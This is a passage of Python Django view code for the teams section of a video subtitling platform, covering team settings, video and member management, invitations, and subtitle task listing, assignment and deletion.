pagination_info = paginate(qs, per_page, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_video_md_list'] = team_video_md_list\n extra_context['team_workflows'] = list(\n Workflow.objects.filter(team=team.id)\n .select_related('project', 'team', 'team_video'))\n\n if is_editor:\n team_video_ids = [record.team_video_pk for record in team_video_md_list]\n team_videos = list(TeamVideo.objects.filter(id__in=team_video_ids).select_related('video', 'team', 'project'))\n team_videos = dict((tv.pk, tv) for tv in team_videos)\n for record in team_video_md_list:\n if record:\n record._team_video = team_videos.get(record.team_video_pk)\n if record._team_video:\n record._team_video.original_language_code = record.original_language\n record._team_video.completed_langs = record.video_completed_langs\n\n return extra_context\n\ndef role_saved(request, slug):\n messages.success(request, _(u'Member saved.'))\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n return HttpResponseRedirect(return_path)\n\ndef completed_videos(request, slug):\n team = Team.get(slug, request.user)\n if team.is_member(request.user):\n qs = TeamVideoLanguagesIndex.results_for_members(team)\n else:\n qs = TeamVideoLanguagesIndex.results()\n qs = qs.filter(team_id=team.id).filter(is_complete=True).order_by('-video_complete_date')\n\n extra_context = widget.add_onsite_js_files({})\n extra_context.update({\n 'team': team\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return object_list(request, queryset=qs,\n paginate_by=VIDEOS_ON_PAGE,\n template_name='teams/completed_videos.html',\n extra_context=extra_context,\n template_object_name='team_video')\n\ndef videos_actions(request, slug):\n team = Team.get(slug, request.user)\n\n try:\n user = request.user if request.user.is_authenticated() else None\n member = team.members.get(user=user) if user else None\n except TeamMember.DoesNotExist:\n member = False\n\n public_only = False if member else True\n qs = Action.objects.for_team(team, public_only=public_only)\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=ACTIONS_ON_PAGE,\n template_name='teams/videos_actions.html',\n extra_context=extra_context,\n template_object_name='videos_action')\n\n@render_to('teams/create.html')\n@staff_member_required\ndef create(request):\n user = request.user\n\n if not DEV and not (user.is_superuser and user.is_active):\n raise Http404\n\n if request.method == 'POST':\n form = CreateTeamForm(request.user, request.POST, request.FILES)\n if form.is_valid():\n team = form.save(user)\n messages.success(request, _(\"\"\"\n Your team has been created. Here are some next steps:\n \n \"\"\" % dict(\n edit=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n activate=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n create=reverse(\"teams:settings_projects\", kwargs={\"slug\": team.slug}),\n lang=reverse(\"teams:settings_languages\", kwargs={\"slug\": team.slug}),\n custom=reverse(\"teams:settings_guidelines\", kwargs={\"slug\": team.slug}),\n )))\n return redirect(reverse(\"teams:settings_basic\", kwargs={\"slug\":team.slug}))\n else:\n form = CreateTeamForm(request.user)\n\n return { 'form': form }\n\n\n# Settings\ndef _delete_team(request, team):\n if not can_delete_team(team, request.user):\n messages.error(request, _(u'You do not have permission to delete this team.'))\n return None\n\n team.deleted = True\n team.save()\n\n return HttpResponseRedirect(reverse('teams:index'))\n\n@render_to('teams/settings.html')\n@login_required\ndef settings_basic(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST.get('delete'):\n r = _delete_team(request, team)\n if r:\n return r\n\n if can_rename_team(team, request.user):\n FormClass = RenameableSettingsForm\n else:\n FormClass = SettingsForm\n\n if request.POST:\n form = FormClass(request.POST, request.FILES, instance=team)\n\n if form.is_valid():\n try:\n form.save()\n except:\n logger.exception(\"Error on changing team settings\")\n raise\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = FormClass(instance=team)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-guidelines.html')\n@login_required\ndef settings_guidelines(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = dict((s.key_name, s.data) for s in team.settings.messages_guidelines())\n if request.POST:\n form = GuidelinesMessagesForm(request.POST, initial=initial)\n\n if form.is_valid():\n for key, val in form.cleaned_data.items():\n setting, c = Setting.objects.get_or_create(team=team, key=Setting.KEY_IDS[key])\n setting.data = val\n setting.save()\n\n messages.success(request, _(u'Guidelines and messages updated.'))\n return HttpResponseRedirect(request.path)\n else:\n form = GuidelinesMessagesForm(initial=initial)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-permissions.html')\n@login_required\ndef settings_permissions(request, slug):\n team = Team.get(slug, request.user)\n workflow = Workflow.get_for_target(team.id, 'team')\n moderated = team.moderates_videos()\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST:\n form = PermissionsForm(request.POST, instance=team)\n workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n if form.is_valid() and workflow_form.is_valid():\n form.save()\n\n if form.cleaned_data['workflow_enabled']:\n workflow_form.save()\n\n moderation_changed = moderated != form.instance.moderates_videos()\n if moderation_changed:\n update_video_moderation.delay(team)\n invalidate_video_moderation_caches.delay(team)\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = PermissionsForm(instance=team)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects.html')\n@login_required\ndef settings_projects(request, slug):\n team = Team.get(slug, request.user)\n projects = team.project_set.exclude(name=Project.DEFAULT_NAME)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n return { 'team': team, 'projects': projects, }\n\ndef _set_languages(team, codes_preferred, codes_blacklisted):\n tlps = TeamLanguagePreference.objects.for_team(team)\n\n existing = set(tlp.language_code for tlp in tlps)\n\n desired_preferred = set(codes_preferred)\n desired_blacklisted = set(codes_blacklisted)\n desired = desired_preferred | desired_blacklisted\n\n # Figure out which languages need to be deleted/created/changed.\n to_delete = existing - desired\n\n to_create_preferred = desired_preferred - existing\n to_set_preferred = desired_preferred & existing\n\n to_create_blacklisted = desired_blacklisted - existing\n to_set_blacklisted = desired_blacklisted & existing\n\n # Delete unneeded prefs.\n for tlp in tlps.filter(language_code__in=to_delete):\n tlp.delete()\n\n # Change existing prefs.\n for tlp in tlps.filter(language_code__in=to_set_preferred):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = True, False, False\n tlp.save()\n\n for tlp in tlps.filter(language_code__in=to_set_blacklisted):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = False, False, False\n tlp.save()\n\n # Create remaining prefs.\n for lang in to_create_preferred:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=True)\n tlp.save()\n\n for lang in to_create_blacklisted:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=False)\n tlp.save()\n\n@render_to('teams/settings-languages.html')\n@login_required\ndef settings_languages(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n preferred = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=True)]\n blacklisted = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=False)]\n initial = {'preferred': preferred, 'blacklisted': blacklisted}\n\n if request.POST:\n form = LanguagesForm(team, request.POST, initial=initial)\n\n if form.is_valid():\n _set_languages(team, form.cleaned_data['preferred'], form.cleaned_data['blacklisted'])\n\n messages.success(request, _(u'Settings saved.'))\n invalidate_video_caches.delay(team.pk)\n return HttpResponseRedirect(request.path)\n else:\n form = LanguagesForm(team, initial=initial)\n\n return { 'team': team, 'form': form }\n\n\n# Videos\n@render_to('teams/add_video.html')\n@login_required\ndef add_video(request, slug):\n team = Team.get(slug, request.user)\n\n project_id = request.GET.get('project') or request.POST.get('project') or None\n project = Project.objects.get(team=team, pk=project_id) if project_id else team.default_project\n\n if request.POST and not can_add_video(team, request.user, project):\n messages.error(request, _(u\"You can't add that video to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = {\n 'video_url': request.GET.get('url', ''),\n 'title': request.GET.get('title', '')\n }\n\n if project:\n initial['project'] = project\n\n form = AddTeamVideoForm(team, request.user, request.POST or None, request.FILES or None, initial=initial)\n\n if form.is_valid():\n obj = form.save(False)\n obj.added_by = request.user\n obj.save()\n api_teamvideo_new.send(obj)\n messages.success(request, form.success_message())\n return redirect(team.get_absolute_url())\n\n return {\n 'form': form,\n 'team': team\n }\n\n@login_required\ndef move_video(request):\n form = MoveTeamVideoForm(request.user, request.POST)\n\n if form.is_valid():\n team_video = form.cleaned_data['team_video']\n team = form.cleaned_data['team']\n project = form.cleaned_data['project']\n team_video.move_to(team, project)\n messages.success(request, _(u'The video has been moved to the new team.'))\n else:\n for e in flatten_errorlists(form.errors):\n messages.error(request, e)\n\n return HttpResponseRedirect(request.POST.get('next', '/'))\n\n@render_to('teams/add_videos.html')\n@login_required\ndef add_videos(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_add_video(team, request.user):\n messages.error(request, _(u\"You can't add videos to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n form = AddTeamVideosFromFeedForm(team, request.user, request.POST or None)\n\n if form.is_valid():\n team_videos = form.save()\n [api_teamvideo_new.send(tv) for tv in team_videos]\n messages.success(request, form.success_message() % {'count': len(team_videos)})\n return redirect(team)\n\n return { 'form': form, 'team': team, }\n\n@login_required\n@render_to('teams/team_video.html')\ndef team_video(request, team_video_pk):\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if not can_edit_video(team_video, request.user):\n messages.error(request, _(u'You can\\'t edit this video.'))\n return HttpResponseRedirect(team_video.team.get_absolute_url())\n\n meta = team_video.video.metadata()\n form = EditTeamVideoForm(request.POST or None, request.FILES or None,\n instance=team_video, user=request.user, initial=meta)\n\n if form.is_valid():\n form.save()\n messages.success(request, _('Video has been updated.'))\n return redirect(team_video)\n\n context = widget.add_onsite_js_files({})\n\n context.update({\n 'team': team_video.team,\n 'team_video': team_video,\n 'form': form,\n 'user': request.user,\n 'widget_params': base_widget_params(request, {'video_url': team_video.video.get_video_url(), 'base_state': {}})\n })\n return context\n\n@render_to_json\n@login_required\ndef remove_video(request, team_video_pk):\n def _error_resp(request, next, error):\n if request.is_ajax():\n return { 'success': False, 'error': error }\n else:\n messages.error(request, error)\n return HttpResponseRedirect(next)\n\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if request.method != 'POST':\n return _error_resp(request, reverse('teams:user_teams'),\n _(u'Request must be a POST request.'))\n\n next = request.POST.get('next', reverse('teams:user_teams'))\n wants_delete = request.POST.get('del-opt') == 'total-destruction'\n\n if wants_delete:\n if not can_delete_video(team_video, request.user):\n return _error_resp(request, next,\n _(u\"You can't delete that video.\"))\n else:\n if not can_remove_video(team_video, request.user):\n return _error_resp(request, next,\n _(u\"You can't remove that video.\"))\n\n for task in team_video.task_set.all():\n task.delete()\n\n video = team_video.video\n\n team_video.delete()\n\n if wants_delete:\n video.delete()\n msg = _(u'Video has been deleted from Amara.')\n else:\n msg = _(u'Video has been removed from the team.')\n\n if request.is_ajax():\n return { 'success': True }\n else:\n messages.success(request, msg)\n return HttpResponseRedirect(next)\n\n\n# Members\n@render_to('teams/members-list.html')\ndef detail_members(request, slug, role=None):\n q = request.REQUEST.get('q')\n lang = request.GET.get('lang')\n filtered = False\n\n team = Team.get(slug, request.user)\n qs = team.members.select_related('user').filter(user__is_active=True)\n\n if q:\n filtered = True\n for term in filter(None, [term.strip() for term in q.split()]):\n qs = qs.filter(Q(user__first_name__icontains=term)\n | Q(user__last_name__icontains=term)\n | Q(user__email__icontains=term)\n | Q(user__username__icontains=term)\n | Q(user__biography__icontains=term))\n\n if lang:\n filtered = True\n qs = qs.filter(user__userlanguage__language=lang)\n\n if role:\n filtered = True\n if role == 'admin':\n qs = qs.filter(role__in=[TeamMember.ROLE_OWNER, TeamMember.ROLE_ADMIN])\n else:\n qs = qs.filter(role=role)\n\n extra_context = widget.add_onsite_js_files({})\n extra_context['filtered'] = filtered\n\n team_member_list, pagination_info = paginate(qs, MEMBERS_ON_PAGE, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_member_list'] = team_member_list\n\n # if we are a member that can also edit roles, we create a dict of\n # roles that we can assign, this will vary from user to user, since\n # let's say an admin can change roles, but not for anyone above him\n # the owner, for example\n assignable_roles = []\n if roles_user_can_assign(team, request.user):\n for member in team_member_list:\n if can_assign_role(team, request.user, member.role, member.user):\n assignable_roles.append(member)\n\n users = team.members.values_list('user', flat=True)\n user_langs = set(UserLanguage.objects.filter(user__in=users).values_list('language', flat=True))\n\n extra_context.update({\n 'team': team,\n 'query': q,\n 'role': role,\n 'assignable_roles': assignable_roles,\n 'languages': sorted(languages_with_labels(user_langs).items(), key=lambda pair: pair[1]),\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return extra_context\n\n@login_required\ndef remove_member(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n member = get_object_or_404(TeamMember, team=team, user__pk=user_pk)\n\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n\n if can_assign_role(team, request.user, member.role, member.user):\n user = member.user\n if not user == request.user:\n TeamMember.objects.filter(team=team, user=user).delete()\n messages.success(request, _(u'Member has been removed from the team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'Use the \"Leave this team\" button to remove yourself from this team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'You don\\'t have permission to remove this member from the team.'))\n return HttpResponseRedirect(return_path)\n\n@login_required\ndef applications(request, slug):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n\n qs = team.applications.all()\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=APLICATIONS_ON_PAGE,\n template_name='teams/applications.html',\n template_object_name='applications',\n extra_context=extra_context)\n\n@login_required\ndef approve_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).approve()\n messages.success(request, _(u'Application approved.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t approve applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@login_required\ndef deny_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).deny()\n messages.success(request, _(u'Application denied.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t deny applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@render_to('teams/invite_members.html')\n@login_required\ndef invite_members(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_invite(team, request.user):\n return HttpResponseForbidden(_(u'You cannot invite people to this team.'))\n if request.POST:\n form = InviteForm(team, request.user, request.POST)\n if form.is_valid():\n # the form will fire the notifications for invitees\n # this cannot be done on model signal, since you might be\n # sending invites twice for the same user, and that borks\n # the naive signal for only created invitations\n form.save()\n return HttpResponseRedirect(reverse('teams:detail_members',\n args=[], kwargs={'slug': team.slug}))\n else:\n form = InviteForm(team, request.user)\n\n return {\n 'team': team,\n 'form': form,\n }\n\n@login_required\ndef accept_invite(request, invite_pk, accept=True):\n invite = get_object_or_404(Invite, pk=invite_pk, user=request.user)\n\n if accept:\n invite.accept()\n else:\n invite.deny()\n\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n@login_required\ndef join_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n if not can_join_team(team, user):\n messages.error(request, _(u'You cannot join this team.'))\n else:\n member = TeamMember(team=team, user=user, role=TeamMember.ROLE_CONTRIBUTOR)\n member.save()\n messages.success(request, _(u'You are now a member of this team.'))\n notifier.team_member_new.delay(member.pk)\n return redirect(team)\n\ndef _check_can_leave(team, user):\n \"\"\"Return an error message if the member cannot leave the team, otherwise None.\"\"\"\n\n try:\n member = TeamMember.objects.get(team=team, user=user)\n except TeamMember.DoesNotExist:\n return u'You are not a member of this team.'\n\n if not team.members.exclude(pk=member.pk).exists():\n return u'You are the last member of this team.'\n\n is_last_owner = (\n member.role == TeamMember.ROLE_OWNER\n and not team.members.filter(role=TeamMember.ROLE_OWNER).exclude(pk=member.pk).exists()\n )\n if is_last_owner:\n return u'You are the last owner of this team.'\n\n is_last_admin = (\n member.role == TeamMember.ROLE_ADMIN\n and not team.members.filter(role=TeamMember.ROLE_ADMIN).exclude(pk=member.pk).exists()\n and not team.members.filter(role=TeamMember.ROLE_OWNER).exists()\n )\n if is_last_admin:\n return u'You are the last admin of this team.'\n\n return None\n\n@login_required\ndef leave_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n error = _check_can_leave(team, user)\n if error:\n messages.error(request, _(error))\n else:\n member = TeamMember.objects.get(team=team, user=user)\n tm_user_pk = member.user.pk\n team_pk = member.team.pk\n member.delete()\n notifier.team_member_leave(team_pk, tm_user_pk)\n\n messages.success(request, _(u'You have left this team.'))\n\n return redirect(request.META.get('HTTP_REFERER') or team)\n\n@permission_required('teams.change_team')\ndef highlight(request, slug, highlight=True):\n item = get_object_or_404(Team, slug=slug)\n item.highlight = highlight\n item.save()\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\ndef _member_search_result(member, team, task_id, team_video_id, task_type, task_lang):\n result = [member.user.id, u'%s (%s)' % (member.user, member.user.username)]\n\n if task_id:\n task = Task.objects.not_deleted().get(team=team, pk=task_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task(member.user, task)]\n elif team_video_id:\n team_video = TeamVideo.objects.get(pk=team_video_id)\n if member.has_max_tasks():\n result += [False]\n else:\n result += [can_perform_task_for(member.user, task_type, team_video, task_lang)]\n else:\n result += [None]\n\n return result\n\n@render_to_json\ndef search_members(request, slug):\n team = Team.get(slug, request.user)\n q = request.GET.get('term', '').replace('(', '').replace(')', '')\n terms = get_terms(q)\n\n task_id = request.GET.get('task')\n task_type = request.GET.get('task_type')\n task_lang = request.GET.get('task_lang')\n team_video_id = request.GET.get('team_video')\n\n members = team.members.filter(user__is_active=True)\n for term in terms:\n members = members.filter(\n Q(user__username__icontains=term) |\n Q(user__first_name__icontains=term) |\n Q(user__last_name__icontains=term)\n )\n members = members.select_related('user')[:MAX_MEMBER_SEARCH_RESULTS]\n\n results = [_member_search_result(m, team, task_id, team_video_id, task_type, task_lang)\n for m in members]\n\n return { 'results': results }\n\n\n# Tasks\ndef _get_or_create_workflow(team_slug, project_id, team_video_id):\n try:\n workflow = Workflow.objects.get(team__slug=team_slug, project=project_id,\n team_video=team_video_id)\n except Workflow.DoesNotExist:\n # We special case this because Django won't let us create new models\n # with the IDs, we need to actually pass in the Model objects for\n # the ForeignKey fields.\n #\n # Most of the time we won't need to do these three extra queries.\n\n team = Team.objects.get(slug=team_slug)\n project = Project.objects.get(pk=project_id) if project_id else None\n team_video = TeamVideo.objects.get(pk=team_video_id) if team_video_id else None\n\n workflow = Workflow(team=team, project=project, team_video=team_video)\n\n return workflow\n\ndef _task_languages(team, user):\n languages = filter(None, Task.objects.filter(team=team, deleted=False)\n .values_list('language', flat=True)\n .distinct())\n\n language_labels = dict(get_language_choices(with_empty=True))\n\n # TODO: Handle the team language setting here once team settings are\n # implemented.\n languages = list(set(languages))\n lang_data = []\n for l in languages:\n if language_labels.get(l):\n lang_data.append({'code': l, 'name': language_labels[l]} )\n else:\n logger.error(\"Failed to find language code for task\", extra={\n \"data\": {\n \"language_code\": l,\n \"supported\": language_labels\n }\n })\n return lang_data\n\ndef _task_category_counts(team, filters, user):\n tasks = team.task_set.incomplete()\n\n if filters['language']:\n tasks = tasks.filter(language=filters['language'])\n\n if filters['team_video']:\n tasks = tasks.filter(team_video=int(filters['team_video']))\n\n if filters['assignee']:\n if filters['assignee'] == 'none':\n tasks = tasks.filter(assignee=None)\n else:\n tasks = tasks.filter(assignee=user)\n\n counts = { 'all': tasks.count() }\n\n for type in ['Subtitle', 'Translate', 'Review', 'Approve']:\n counts[type.lower()] = tasks.filter(type=Task.TYPE_IDS[type]).count()\n\n return counts\n\ndef _tasks_list(request, team, project, filters, user):\n '''List tasks for the given team, optionally filtered.\n\n `filters` should be an object/dict with zero or more of the following keys:\n\n * type: a string describing the type of task. 'Subtitle', 'Translate', etc.\n * completed: true or false\n * assignee: user ID as an integer\n * team_video: team video ID as an integer\n\n '''\n tasks = Task.objects.filter(team=team.id, deleted=False)\n\n if project:\n tasks = tasks.filter(team_video__project = project)\n\n if filters.get('team_video'):\n tasks = tasks.filter(team_video=filters['team_video'])\n\n if filters.get('completed'):\n tasks = tasks.filter(completed__isnull=False)\n else:\n tasks = tasks.filter(completed=None)\n\n if filters.get('language'):\n if filters.get('language') == 'mine' and request.user.is_authenticated():\n tasks = tasks.filter(language__in=[ul.language for ul in request.user.get_languages()])\n else:\n tasks = tasks.filter(language=filters['language'])\n\n if filters.get('q'):\n terms = get_terms(filters['q'])\n for term in terms:\n tasks = tasks.filter(\n Q(team_video__video__title__icontains=term)\n | Q(team_video__title__icontains=term)\n )\n\n if filters.get('type'):\n tasks = tasks.filter(type=Task.TYPE_IDS[filters['type']])\n\n if filters.get('assignee'):\n assignee = filters.get('assignee')\n\n if assignee == 'me':\n tasks = tasks.filter(assignee=user)\n elif assignee == 'none':\n tasks = tasks.filter(assignee=None)\n elif assignee and assignee.isdigit():\n tasks = tasks.filter(assignee=int(assignee))\n elif assignee:\n tasks = tasks.filter(assignee=User.objects.get(username=assignee))\n\n return tasks.select_related('team_video__video', 'team_video__team', 'assignee', 'team', 'team_video__project')\n\ndef _order_tasks(request, tasks):\n sort = request.GET.get('sort', '-created')\n\n if sort == 'created':\n tasks = tasks.order_by('created')\n elif sort == '-created':\n tasks = tasks.order_by('-created')\n elif sort == 'expires':\n tasks = tasks.exclude(expiration_date=None).order_by('expiration_date')\n elif sort == '-expires':\n tasks = tasks.exclude(expiration_date=None).order_by('-expiration_date')\n\n return tasks\n\ndef _get_task_filters(request):\n return { 'language': request.GET.get('lang'),\n 'type': request.GET.get('type'),\n 'team_video': request.GET.get('team_video'),\n 'assignee': request.GET.get('assignee'),\n 'q': request.GET.get('q'), }\n\n@render_to('teams/tasks.html')\ndef team_tasks(request, slug, project_slug=None):\n team = Team.get(slug, request.user)\n\n if not can_view_tasks_tab(team, request.user):\n messages.error(request, _(\"You cannot view this team's tasks.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n # TODO: Review this\n if project_slug is not None:\n project = get_object_or_404(Project, team=team, slug=project_slug)\n else:\n project = None\n\n user = request.user if request.user.is_authenticated() else None\n member = team.members.get(user=user) if user else None\n languages = _task_languages(team, request.user)\n languages = sorted(languages, key=lambda l: l['name'])\n filters = _get_task_filters(request)\n filtered = 0\n\n tasks = _order_tasks(request,\n _tasks_list(request, team, project, filters, user))\n category_counts = _task_category_counts(team, filters, request.user)\n tasks, pagination_info = paginate(tasks, TASKS_ON_PAGE, request.GET.get('page'))\n\n if filters.get('team_video'):\n filters['team_video'] = TeamVideo.objects.get(pk=filters['team_video'])\n\n if filters.get('assignee'):\n if filters['assignee'] == 'me':\n filters['assignee'] = team.members.get(user=request.user)\n elif filters['assignee'] == 'none':\n filters['assignee'] == None\n elif filters['assignee'].isdigit():\n filters['assignee'] = team.members.get(user=filters['assignee'])\n else:\n filters['assignee'] = team.members.get(user=User.objects.get(username=filters['assignee']))\n\n filtered = filtered + 1\n\n if filters.get('language'):\n filtered = filtered + 1\n\n if filters.get('type'):\n filtered = filtered + 1\n\n widget_settings = {}\n from apps.widget.rpc import add_general_settings\n add_general_settings(request, widget_settings)\n\n video_pks = [t.team_video.video_id for t in tasks]\n video_urls = dict([(vu.video_id, vu.effective_url) for vu in\n VideoUrl.objects.filter(video__in=video_pks, primary=True)])\n\n for t in tasks:\n t.cached_video_url = video_urls.get(t.team_video.video_id)\n\n context = {\n 'team': team,\n 'project': project, # TODO: Review\n 'user_can_delete_tasks': can_delete_tasks(team, request.user),\n 'user_can_assign_tasks': can_assign_tasks(team, request.user),\n 'assign_form': TaskAssignForm(team, member),\n 'languages': languages,\n 'category_counts': category_counts,\n 'tasks': tasks,\n 'filters': filters,\n 'widget_settings': widget_settings,\n 'filtered': filtered,\n 'member': member,\n 'upload_draft_form': UploadDraftForm()\n }\n\n context.update(pagination_info)\n\n return context\n\n@render_to('teams/create_task.html')\ndef create_task(request, slug, team_video_pk):\n team = get_object_or_404(Team, slug=slug)\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk, team=team)\n can_assign = can_assign_tasks(team, request.user, team_video.project)\n\n if request.POST:\n form = TaskCreateForm(request.user, team, team_video, request.POST)\n\n if form.is_valid():\n task = form.save(commit=False)\n\n task.team = team\n task.team_video = team_video\n\n task.set_expiration()\n\n if task.type == Task.TYPE_IDS['Subtitle']:\n task.language = ''\n\n if task.type in [Task.TYPE_IDS['Review'], Task.TYPE_IDS['Approve']]:\n task.approved = Task.APPROVED_IDS['In Progress']\n task.subtitle_version = task.team_video.video.latest_version(language_code=task.language)\n\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n return HttpResponseRedirect(reverse('teams:team_tasks', args=[],\n kwargs={'slug': team.slug}))\n else:\n form = TaskCreateForm(request.user, team, team_video)\n\n subtitlable = json.dumps(can_create_task_subtitle(team_video, request.user))\n translatable_languages = json.dumps(can_create_task_translate(team_video, request.user))\n\n language_choices = json.dumps(get_language_choices(True))\n\n return { 'form': form, 'team': team, 'team_video': team_video,\n 'translatable_languages': translatable_languages,\n 'language_choices': language_choices,\n 'subtitlable': subtitlable,\n 'can_assign': can_assign, }\n\n@login_required\ndef perform_task(request, slug=None, task_pk=None):\n task_pk = task_pk or request.POST.get('task_id')\n task = Task.objects.get(pk=task_pk)\n if slug:\n team = get_object_or_404(Team,slug=slug)\n if task.team != team:\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n if not can_perform_task(request.user, task):\n return HttpResponseForbidden(_(u'You are not allowed to perform this task.'))\n\n task.assignee = request.user\n task.save()\n\n # ... perform task ...\n return HttpResponseRedirect(task.get_perform_url())\n\ndef _delete_subtitle_version(version):\n sl = version.language\n n = version.version_no\n\n # Delete this specific version...\n version.delete()\n\n # We also want to delete all draft subs leading up to this version.\n for v in sl.subtitleversion_set.filter(version_no__lt=n).order_by('-version_no'):\n if v.is_public:\n break\n v.delete()\n\n # And if we've deleted everything in the language, we can delete the language as well.\n if not sl.subtitleversion_set.exists():\n sl.delete()\n\ndef delete_task(request, slug):\n '''Mark a task as deleted.\n\n The task will not be physically deleted from the database, but will be\n flagged and won't appear in further task listings.\n\n '''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskDeleteForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n video = task.team_video.video\n task.deleted = True\n\n if task.subtitle_version:\n if form.cleaned_data['discard_subs']:\n _delete_subtitle_version(task.subtitle_version)\n task.subtitle_version = None\n\n if task.get_type_display() in ['Review', 'Approve']:\n # TODO: Handle subtitle/translate tasks here too?\n if not form.cleaned_data['discard_subs'] and task.subtitle_version:\n task.subtitle_version.moderation_status = MODERATION.APPROVED\n task.subtitle_version.save()\n metadata_manager.update_metadata(video.pk)\n\n task.save()\n\n messages.success(request, _('Task deleted.'))\n else:\n messages.error(request, _('You cannot delete this task.'))\n\n return HttpResponseRedirect(next)\n\ndef assign_task(request, slug):\n '''Assign a task to the given user, or unassign it if null/None.'''\n team = get_object_or_404(Team, slug=slug)\n next = request.POST.get('next', reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n\n form = TaskAssignForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n assignee = form.cleaned_data['assignee']\n\n if task.assignee == request.user:\n was_mine = True\n else:\n was_mine = False\n\n task.assignee = assignee\n task.set_expiration()\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n\n if task.assignee is None and was_mine:\n messages.success(request, _('Task declined.'))\n else:\n messages.success(request, _('Task assigned.'))\n else:\n messages.error(request, _('You cannot assign this task.'))\n\n return HttpResponseRedirect(next)\n\n@render_to_json\n@login_required\ndef assign_task_ajax(request, slug):\n '''Assign a task to the given user, or unassign it if null/None.'''\n team = get_object_or_404(Team, slug=slug)\n\n form = TaskAssignForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n assignee = form.cleaned_data['assignee']\n\n task.assignee = assignee\n task.set_expiration()\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n\n return { 'success': True }\n else:\n return HttpResponseForbidden(_(u'Invalid assignment attempt.'))\n\ndef upload_draft(request, slug):\n\n if request.POST:\n form = UploadDraftForm(request.POST)\n\n if form.is_valid():\n\n team = get_object_or_404(Team, slug=slug)\n task = form.cleaned_data['task']\n draft = form.cleaned_data['draft']\n\n # 